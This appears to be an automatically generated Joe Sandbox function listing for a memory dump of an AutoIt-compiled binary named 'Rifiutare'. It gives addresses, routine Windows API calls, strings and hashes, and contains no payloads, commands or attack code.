Associated: 00000007.00000002.1742251898.0000000000C30000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742433362.0000000000CCD000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742433362.0000000000CF3000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742573979.0000000000CFD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742616192.0000000000D05000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_c30000_Rifiutare.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 98471540e31770dbd558460da1c0656227e749fd77f28253f22d843c8cc72623
Instruction ID: b4763853fee27c8056b38dd77052d5475c070e6a2ecce1601f134f78c5fe15b8
Opcode Fuzzy Hash: 98471540e31770dbd558460da1c0656227e749fd77f28253f22d843c8cc72623
Instruction Fuzzy Hash: BAC1C275D04249AFDB21DFA9C8C1BBDBBB8FF09310F144199E565A7392CB309A42CB61

Function 00C33546 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 44
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00C33574
CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00C33595
ShowWindow.USER32(00000000,?,?,?,?,?,?,00C3292D,?), ref: 00C335A9
ShowWindow.USER32(00000000,?,?,?,?,?,?,00C3292D,?), ref: 00C335B2

Strings

AutoIt v3, xrefs: 00C3356C, 00C33571, 00C33572
edit, xrefs: 00C3358F

Memory Dump Source

Source File: 00000007.00000002.1742302453.0000000000C31000.00000020.00000001.01000000.00000006.sdmp, Offset: 00C30000, based on PE: true

Associated: 00000007.00000002.1742251898.0000000000C30000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742433362.0000000000CCD000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742433362.0000000000CF3000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742573979.0000000000CFD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742616192.0000000000D05000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_c30000_Rifiutare.jbxd

Similarity

API ID: Window$CreateShow
String ID: AutoIt v3$edit
API String ID: 1584632944-3779509399
Opcode ID: 1ed036698864a4aa79598b2c3f0845a64032361916bd444cef6d0410346230bd
Instruction ID: 93a78ffb65b2f43916e1289c2ef3e0b7cf064f993af403b0a82f8d3bcf57061d
Opcode Fuzzy Hash: 1ed036698864a4aa79598b2c3f0845a64032361916bd444cef6d0410346230bd
Instruction Fuzzy Hash: EAF0DA755413907AEB311727AC0CF3B2E7DD7CAF60B01002EF909E2260C5791850DAB0

Function 00C3529A Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 58
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RegOpenKeyExW.KERNELBASE(80000001,Control Panel\Mouse,00000000,00000001,00000000,?,?,80000001,80000001,?,00C3528D,SwapMouseButtons,00000004,?), ref: 00C352BE
RegQueryValueExW.KERNELBASE(00000000,00000000,00000000,00000000,?,?,?,?,?,80000001,80000001,?,00C3528D,SwapMouseButtons,00000004,?), ref: 00C352DF
RegCloseKey.KERNELBASE(00000000,?,?,?,80000001,80000001,?,00C3528D,SwapMouseButtons,00000004,?), ref: 00C35301

Strings

Control Panel\Mouse, xrefs: 00C352BC

Memory Dump Source

Source File: 00000007.00000002.1742302453.0000000000C31000.00000020.00000001.01000000.00000006.sdmp, Offset: 00C30000, based on PE: true

Associated: 00000007.00000002.1742251898.0000000000C30000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742433362.0000000000CCD000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742433362.0000000000CF3000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742573979.0000000000CFD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742616192.0000000000D05000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_c30000_Rifiutare.jbxd

Similarity

API ID: CloseOpenQueryValue
String ID: Control Panel\Mouse
API String ID: 3677997916-824357125
Opcode ID: 4bf76043bd6e7113e85dc05d0c5e89e26891a0dcd4cfaaa727d4f420555d1e22
Instruction ID: 9e9f73e1df4c987b1d28192b987d0e7930f06e02d2fb3c3ba3b091e652e1d841
Opcode Fuzzy Hash: 4bf76043bd6e7113e85dc05d0c5e89e26891a0dcd4cfaaa727d4f420555d1e22
Instruction Fuzzy Hash: 89112AB5621608BFDB218F68DC84EEFBBB8EF04744F104469E806E7120E271DE459BA0

Function 00C3F220 Relevance: 6.7, APIs: 2, Strings: 1, Instructions: 1414COMMON

Download Yara Rule

Strings

Variable must be of type 'Object'., xrefs: 00C84D95

Memory Dump Source

Source File: 00000007.00000002.1742302453.0000000000C31000.00000020.00000001.01000000.00000006.sdmp, Offset: 00C30000, based on PE: true

Associated: 00000007.00000002.1742251898.0000000000C30000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742433362.0000000000CCD000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742433362.0000000000CF3000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742573979.0000000000CFD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742616192.0000000000D05000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_c30000_Rifiutare.jbxd

Similarity

API ID:
String ID: Variable must be of type 'Object'.
API String ID: 0-109567571
Opcode ID: d4f84a15fc671c5649508e23a76df32ca776533175b87189beee05706c10c285
Instruction ID: 802b22ba6e8945d1edcfc9137781e045cc74a2e7f76e628695d3148522803ad9
Opcode Fuzzy Hash: d4f84a15fc671c5649508e23a76df32ca776533175b87189beee05706c10c285
Instruction Fuzzy Hash: 16C28A75E10605CFCB24DF58C881BAEB7B1FF09304F248969E815AB3A1D371AE42DB95

Function 00C501FB Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 43
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__CxxThrowException@8.LIBVCRUNTIME ref: 00C50A88

Part of subcall function 00C536C4: RaiseException.KERNEL32(?,?,?,00C50AAA,?,?,?,?,?,?,?,?,00C50AAA,?,00CF96A0), ref: 00C53724

__CxxThrowException@8.LIBVCRUNTIME ref: 00C50AA5

Strings

Unknown exception, xrefs: 00C50AB2

Memory Dump Source

Source File: 00000007.00000002.1742302453.0000000000C31000.00000020.00000001.01000000.00000006.sdmp, Offset: 00C30000, based on PE: true

Associated: 00000007.00000002.1742251898.0000000000C30000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742433362.0000000000CCD000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742433362.0000000000CF3000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742573979.0000000000CFD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742616192.0000000000D05000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_c30000_Rifiutare.jbxd

Similarity

API ID: Exception@8Throw$ExceptionRaise
String ID: Unknown exception
API String ID: 3476068407-410509341
Opcode ID: 03672ebb8e6e97c5952b8ea3b0bc702230b0426702d2e1d167381e33abf80e9e
Instruction ID: 2c13fc4390dce4a91f8a0504ed76d7ab9ddb18dce133f6cbb4cec46374c12cb4
Opcode Fuzzy Hash: 03672ebb8e6e97c5952b8ea3b0bc702230b0426702d2e1d167381e33abf80e9e
Instruction Fuzzy Hash: 3BF0AF3C90030DB7CF04BAA8EC569AD776C9A10312FB04125BD24D6592EB70EADEA5C9

Function 00CB86CB Relevance: 4.9, APIs: 3, Instructions: 430COMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(00000000,00000067,000000FF,?,?,?), ref: 00CB8A67
TerminateProcess.KERNEL32(00000000), ref: 00CB8A6E
FreeLibrary.KERNEL32(?,?,?,?), ref: 00CB8C4F

Memory Dump Source

Source File: 00000007.00000002.1742302453.0000000000C31000.00000020.00000001.01000000.00000006.sdmp, Offset: 00C30000, based on PE: true

Associated: 00000007.00000002.1742251898.0000000000C30000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742433362.0000000000CCD000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742433362.0000000000CF3000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742573979.0000000000CFD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742616192.0000000000D05000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_c30000_Rifiutare.jbxd

Similarity

API ID: Process$CurrentFreeLibraryTerminate
String ID:
API String ID: 146820519-0
Opcode ID: 92c489ec3a0269e072f3be2a5ecec6ca877ca11f1a6c17cb674767ec6928915b
Instruction ID: 1e51dfbf64f3a389f9672d9782f03530b72a52bd8abcc7f154079ff1c9d92ad3
Opcode Fuzzy Hash: 92c489ec3a0269e072f3be2a5ecec6ca877ca11f1a6c17cb674767ec6928915b
Instruction Fuzzy Hash: 40126B719083419FC714CF28C484B6ABBE5FF89318F14895DE8998B292DB31ED49CF92

Function 00C338E2 Relevance: 4.7, APIs: 3, Instructions: 152comCOMMON

Download Yara Rule

APIs

Part of subcall function 00C33700: MapVirtualKeyW.USER32(0000005B,00000000), ref: 00C33731
Part of subcall function 00C33700: MapVirtualKeyW.USER32(00000010,00000000), ref: 00C33739
Part of subcall function 00C33700: MapVirtualKeyW.USER32(000000A0,00000000), ref: 00C33744
Part of subcall function 00C33700: MapVirtualKeyW.USER32(000000A1,00000000), ref: 00C3374F
Part of subcall function 00C33700: MapVirtualKeyW.USER32(00000011,00000000), ref: 00C33757
Part of subcall function 00C33700: MapVirtualKeyW.USER32(00000012,00000000), ref: 00C3375F

Part of subcall function 00C33768: RegisterWindowMessageW.USER32(00000004,?,00C33AB3), ref: 00C337C0

GetStdHandle.KERNEL32(000000F6,00000000,00000000), ref: 00C33B54
OleInitialize.OLE32 ref: 00C33B72
CloseHandle.KERNEL32(00000000,00000000), ref: 00C73F42

Memory Dump Source

Source File: 00000007.00000002.1742302453.0000000000C31000.00000020.00000001.01000000.00000006.sdmp, Offset: 00C30000, based on PE: true

Associated: 00000007.00000002.1742251898.0000000000C30000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742433362.0000000000CCD000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742433362.0000000000CF3000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742573979.0000000000CFD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742616192.0000000000D05000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_c30000_Rifiutare.jbxd

Similarity

API ID: Virtual$Handle$CloseInitializeMessageRegisterWindow
String ID:
API String ID: 1986988660-0
Opcode ID: 555cf609dec97b1c1eea45a098453a034e0138826b66723191f41fda1a6f5e87
Instruction ID: 5bbaabfbaa82223a99d33c0a555903ada6f9aa1214cdbbd7735ea943f4731bd8
Opcode Fuzzy Hash: 555cf609dec97b1c1eea45a098453a034e0138826b66723191f41fda1a6f5e87
Instruction Fuzzy Hash: 567167B49123408EC788EF69EDAD7397AE0FB99304750812EE40DC73A1EB7085459F79

Function 00C32F13 Relevance: 4.6, APIs: 3, Instructions: 103COMMON

Download Yara Rule

APIs

SetFilePointerEx.KERNELBASE(00000000,?,00000001,00000000,00000001,00000000,00000000), ref: 00C32FBA
SetFilePointerEx.KERNELBASE(00000000,00000000,00000000,?,00000001), ref: 00C32FCA

Memory Dump Source

Source File: 00000007.00000002.1742302453.0000000000C31000.00000020.00000001.01000000.00000006.sdmp, Offset: 00C30000, based on PE: true

Associated: 00000007.00000002.1742251898.0000000000C30000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742433362.0000000000CCD000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742433362.0000000000CF3000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742573979.0000000000CFD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742616192.0000000000D05000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_c30000_Rifiutare.jbxd

Similarity

API ID: FilePointer
String ID:
API String ID: 973152223-0
Opcode ID: 6f73476846c2c37b2150ac9bd588a76b84e31e7a654eb7eacffc70312f82ad59
Instruction ID: 0e6e8f045766dfe37ab77ce6d6508c3fa3cd60a2918640352d87a22cf52fa087
Opcode Fuzzy Hash: 6f73476846c2c37b2150ac9bd588a76b84e31e7a654eb7eacffc70312f82ad59
Instruction Fuzzy Hash: F2316B31A1021AEFDF14CFA8C880B99B7B5FB08714F14862AE919A7244C771FE94DB90

Function 00C68ACE Relevance: 4.6, APIs: 3, Instructions: 61COMMONLIBRARYCODE

Download Yara Rule

APIs

CloseHandle.KERNELBASE(00000000,00000000,?,?,00C689EC,?,00CF9C30,0000000C), ref: 00C68B24
GetLastError.KERNEL32(?,00C689EC,?,00CF9C30,0000000C), ref: 00C68B2E
__dosmaperr.LIBCMT ref: 00C68B59

Memory Dump Source

Source File: 00000007.00000002.1742302453.0000000000C31000.00000020.00000001.01000000.00000006.sdmp, Offset: 00C30000, based on PE: true

Associated: 00000007.00000002.1742251898.0000000000C30000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742433362.0000000000CCD000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742433362.0000000000CF3000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742573979.0000000000CFD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742616192.0000000000D05000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_c30000_Rifiutare.jbxd

Similarity

API ID: CloseErrorHandleLast__dosmaperr
String ID:
API String ID: 2583163307-0
Opcode ID: 15fba44878c2b0c3cd26b852ecc23d8f547be0fa217ff453cbcbefc69a552f6a
Instruction ID: fdb2a892bcc485bec595008fd850798da327f06a33ff14eba31e729d4ff1b69c
Opcode Fuzzy Hash: 15fba44878c2b0c3cd26b852ecc23d8f547be0fa217ff453cbcbefc69a552f6a
Instruction Fuzzy Hash: 33012633B146609BD2342274ACC9B7E674A5BC2734F39031AF9249B1D2DE608D86B261

Function 00C697AB Relevance: 4.6, APIs: 3, Instructions: 50COMMONLIBRARYCODE

Download Yara Rule

APIs

SetFilePointerEx.KERNELBASE(00000000,00000000,00000002,FF8BC369,00000000,FF8BC35D,00000000,1875FF1C,1875FF1C,?,00C6985A,FF8BC369,00000000,00000002,00000000), ref: 00C697E4
GetLastError.KERNEL32(?,00C6985A,FF8BC369,00000000,00000002,00000000,?,00C65F81,00000000,00000000,00000000,00000002,00000000,FF8BC369,00000000,00C56FF1), ref: 00C697EE
__dosmaperr.LIBCMT ref: 00C697F5

Memory Dump Source

Source File: 00000007.00000002.1742302453.0000000000C31000.00000020.00000001.01000000.00000006.sdmp, Offset: 00C30000, based on PE: true

Associated: 00000007.00000002.1742251898.0000000000C30000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742433362.0000000000CCD000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742433362.0000000000CF3000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742573979.0000000000CFD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742616192.0000000000D05000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_c30000_Rifiutare.jbxd

Similarity

API ID: ErrorFileLastPointer__dosmaperr
String ID:
API String ID: 2336955059-0
Opcode ID: 34bcbaa948066f8e806a7f1d9ee5eee326e336410a7c29a66c470e629c856fd6
Instruction ID: 97aa4b81cf576f9c70307225004028030b3273db66a65cac9bfcfdefcac1ca1c
Opcode Fuzzy Hash: 34bcbaa948066f8e806a7f1d9ee5eee326e336410a7c29a66c470e629c856fd6
Instruction Fuzzy Hash: 65014C33620518ABCB259F99DC85D6E7B6EEF85330B280249F811DB190EA71DD41D7A0

Function 00C40AB6 Relevance: 4.0, APIs: 1, Strings: 1, Instructions: 460COMMON

Download Yara Rule

Strings

CALL, xrefs: 00C85B5D

Memory Dump Source

Source File: 00000007.00000002.1742302453.0000000000C31000.00000020.00000001.01000000.00000006.sdmp, Offset: 00C30000, based on PE: true

Associated: 00000007.00000002.1742251898.0000000000C30000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742433362.0000000000CCD000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742433362.0000000000CF3000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742573979.0000000000CFD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742616192.0000000000D05000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_c30000_Rifiutare.jbxd

Similarity

API ID:
String ID: CALL
API String ID: 0-4196123274
Opcode ID: 63ed4860901ab534b261596929a9824edc8a2d6904dcea8a33d91aec29ef42e7
Instruction ID: 7b2d6271427d43b3ea9cfcc5999bad7e665a516f85d3af0ea2a478b144a084dd
Opcode Fuzzy Hash: 63ed4860901ab534b261596929a9824edc8a2d6904dcea8a33d91aec29ef42e7
Instruction Fuzzy Hash: 9B129B70508741CFC724DF24C484B6AB7E1FF84304F25885DE9AA8B3A2D771E985DB86

Function 00C43A70 Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 220COMMON

Download Yara Rule

APIs

__Init_thread_footer.LIBCMT ref: 00C43D44

Strings

CALL, xrefs: 00C43D14

Memory Dump Source

Source File: 00000007.00000002.1742302453.0000000000C31000.00000020.00000001.01000000.00000006.sdmp, Offset: 00C30000, based on PE: true

Associated: 00000007.00000002.1742251898.0000000000C30000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742433362.0000000000CCD000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742433362.0000000000CF3000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742573979.0000000000CFD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742616192.0000000000D05000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_c30000_Rifiutare.jbxd

Similarity

API ID: Init_thread_footer
String ID: CALL
API String ID: 1385522511-4196123274
Opcode ID: aea6d393662dc2b277d8fd49aad2f3343573304f0a04e5a908feb533e3f02bdb
Instruction ID: 9f76643e5d1976374eef458810a8d3ed196c999abeffc4bc41fa1d9cc7765e77
Opcode Fuzzy Hash: aea6d393662dc2b277d8fd49aad2f3343573304f0a04e5a908feb533e3f02bdb
Instruction Fuzzy Hash: 8491AE70504642DFCB10DF14C885B1ABBE1FF84318F14865CE89A9B3A2CB31EA59DF96

Function 00C32950 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 64COMMON

Download Yara Rule

APIs

GetOpenFileNameW.COMDLG32(?), ref: 00C736EF

Part of subcall function 00C350F7: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00C35035,?,?,00C74641,?,?,00000100,00000000,00000000,CMDLINE), ref: 00C35117

Part of subcall function 00C332E0: GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 00C332FF

Strings

X, xrefs: 00C736BD

Memory Dump Source

Source File: 00000007.00000002.1742302453.0000000000C31000.00000020.00000001.01000000.00000006.sdmp, Offset: 00C30000, based on PE: true

Associated: 00000007.00000002.1742251898.0000000000C30000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742433362.0000000000CCD000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742433362.0000000000CF3000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742573979.0000000000CFD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742616192.0000000000D05000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_c30000_Rifiutare.jbxd

Similarity

API ID: Name$Path$FileFullLongOpen
String ID: X
API String ID: 779396738-3081909835
Opcode ID: 3a2c69739a709a29b822cd478d965d0ed07bf39152ccba712b0de750fc81d30a
Instruction ID: 5e33f7f71ab94fc215ffe1b841c0c0ed0df460428758cea67af2645f27736b9d
Opcode Fuzzy Hash: 3a2c69739a709a29b822cd478d965d0ed07bf39152ccba712b0de750fc81d30a
Instruction Fuzzy Hash: 9521A8709142989BCF05DF99C805BEE7BFCAF49314F008019E545A7341DBB85A899FA1

Function 00C38340 Relevance: 3.2, APIs: 2, Instructions: 236fileCOMMON

Download Yara Rule

APIs

ReadFile.KERNELBASE(?,00000000,00010000,?,00000000,00000002,?,00000001,?,?,00C382CB,?,?,?), ref: 00C3848C
SetFilePointerEx.KERNEL32(?,00000000,00000000,?,00000001,00000002,?,00000001,?,?,00C382CB,?,?,?), ref: 00C76572

Memory Dump Source

Source File: 00000007.00000002.1742302453.0000000000C31000.00000020.00000001.01000000.00000006.sdmp, Offset: 00C30000, based on PE: true

Associated: 00000007.00000002.1742251898.0000000000C30000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742433362.0000000000CCD000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742433362.0000000000CF3000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742573979.0000000000CFD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742616192.0000000000D05000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_c30000_Rifiutare.jbxd

Similarity

API ID: File$PointerRead
String ID:
API String ID: 3154509469-0
Opcode ID: 66e5660748194eb5746f6e7be79f903b9709b07db0ad8869a16871c2521d3bd4
Instruction ID: 638de3d03ad4c8c66dab42842e7df97d9f848da466cc71d2b830224004785f46
Opcode Fuzzy Hash: 66e5660748194eb5746f6e7be79f903b9709b07db0ad8869a16871c2521d3bd4
Instruction Fuzzy Hash: 0791EC70A04606EBDF00CF65D884BADBBB0FF05300F248195F8659B395DB75EA89EB61

Function 00C6CDDB Relevance: 3.1, APIs: 2, Instructions: 91COMMON

Download Yara Rule

APIs

Part of subcall function 00C63194: GetLastError.KERNEL32(?,?,00C54E03,?,00000002,?,00C559A6,00C56714), ref: 00C63198
Part of subcall function 00C63194: _free.LIBCMT ref: 00C631CB
Part of subcall function 00C63194: SetLastError.KERNEL32(00000000,?,?,?,?,?,?,?,?,00C56714,00000000), ref: 00C6320C
Part of subcall function 00C63194: _abort.LIBCMT ref: 00C63212

Part of subcall function 00C6CEFA: _abort.LIBCMT ref: 00C6CF2C
Part of subcall function 00C6CEFA: _free.LIBCMT ref: 00C6CF60

Part of subcall function 00C6CB6F: GetOEMCP.KERNEL32(00000000), ref: 00C6CB9A

_free.LIBCMT ref: 00C6CE53
_free.LIBCMT ref: 00C6CE89

Memory Dump Source

Source File: 00000007.00000002.1742302453.0000000000C31000.00000020.00000001.01000000.00000006.sdmp, Offset: 00C30000, based on PE: true

Associated: 00000007.00000002.1742251898.0000000000C30000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742433362.0000000000CCD000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742433362.0000000000CF3000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742573979.0000000000CFD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742616192.0000000000D05000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_c30000_Rifiutare.jbxd

Similarity

API ID: _free$ErrorLast_abort
String ID:
API String ID: 2991157371-0
Opcode ID: 054c0367aad093889319d64d22606bf0e7c9c255cc8c2d032178bb050bd54e15
Instruction ID: 292fff110eb6141b6b37132dd813c952612a893b7a8efd8e1a5b738ed79cf17e
Opcode Fuzzy Hash: 054c0367aad093889319d64d22606bf0e7c9c255cc8c2d032178bb050bd54e15
Instruction Fuzzy Hash: C931C231904208AFDB20EBA9D8C5BBDB7F5EF41720F210199E4549B291DB375E41EB80

Function 00C33195 Relevance: 3.1, APIs: 2, Instructions: 56fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000,00000000,?,?,00C31153,?,00008000,00CCDBF4), ref: 00C331C3
CreateFileW.KERNEL32(?,C0000000,00000007,00000000,00000004,00000080,00000000,00000000,?,?,00C31153,?,00008000,00CCDBF4), ref: 00C73DC2

Memory Dump Source

Source File: 00000007.00000002.1742302453.0000000000C31000.00000020.00000001.01000000.00000006.sdmp, Offset: 00C30000, based on PE: true

Associated: 00000007.00000002.1742251898.0000000000C30000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742433362.0000000000CCD000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742433362.0000000000CF3000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742573979.0000000000CFD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742616192.0000000000D05000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_c30000_Rifiutare.jbxd

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: 17df9ba7bbbef7fe6be2a3ba951862a64f2658e0ddc140bf38bb6ebba877419f
Instruction ID: 080eaccafcd3263533452ea879cb7f11d845676151df63a15a417d33fb850b5f
Opcode Fuzzy Hash: 17df9ba7bbbef7fe6be2a3ba951862a64f2658e0ddc140bf38bb6ebba877419f
Instruction Fuzzy Hash: 90019230185221B6E7311A26CC0EF9B7F98EF46B70F14C310FAA9AA1E0C7B45A54DB90

Function 00C328E0 Relevance: 3.0, APIs: 2, Instructions: 30COMMON

Download Yara Rule

APIs

IsThemeActive.UXTHEME ref: 00C32902

Part of subcall function 00C328AB: SystemParametersInfoW.USER32(00002000,00000000,?,00000000), ref: 00C328C0
Part of subcall function 00C328AB: SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 00C328D7

Part of subcall function 00C3331E: GetCurrentDirectoryW.KERNEL32(00007FFF,?,?,?,?,?,00C3292D,?), ref: 00C3334E
Part of subcall function 00C3331E: IsDebuggerPresent.KERNEL32(?,?,?,?,?,?,00C3292D,?), ref: 00C33361
Part of subcall function 00C3331E: GetFullPathNameW.KERNEL32(00007FFF,?,?,00D02408,00D023F0,?,?,?,?,?,?,00C3292D,?), ref: 00C333CD
Part of subcall function 00C3331E: SetCurrentDirectoryW.KERNEL32(?,00000001,00D02408,?,?,?,?,?,?,?,00C3292D,?), ref: 00C3344E

SystemParametersInfoW.USER32(00002001,00000000,00000002,?), ref: 00C3293C

Memory Dump Source

Source File: 00000007.00000002.1742302453.0000000000C31000.00000020.00000001.01000000.00000006.sdmp, Offset: 00C30000, based on PE: true

Associated: 00000007.00000002.1742251898.0000000000C30000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742433362.0000000000CCD000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742433362.0000000000CF3000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742573979.0000000000CFD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742616192.0000000000D05000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_c30000_Rifiutare.jbxd

Similarity

API ID: InfoParametersSystem$CurrentDirectory$ActiveDebuggerFullNamePathPresentTheme
String ID:
API String ID: 1550534281-0
Opcode ID: f611584f3817c7b0664b2a61645d0b1ad887fdf7625e4be4b91d8a71d341d592
Instruction ID: e9995e361878990cef7d8e8372c1a0cb4e231457708239cbee2c64ed9698e076
Opcode Fuzzy Hash: f611584f3817c7b0664b2a61645d0b1ad887fdf7625e4be4b91d8a71d341d592
Instruction Fuzzy Hash: BFF082725617049FEB10BB61EC4EB6837A4A700711F00486AF549CA2F3CBB9A0549B60

Function 00C3B35E Relevance: 2.6, APIs: 2, Instructions: 59COMMON

Download Yara Rule

APIs

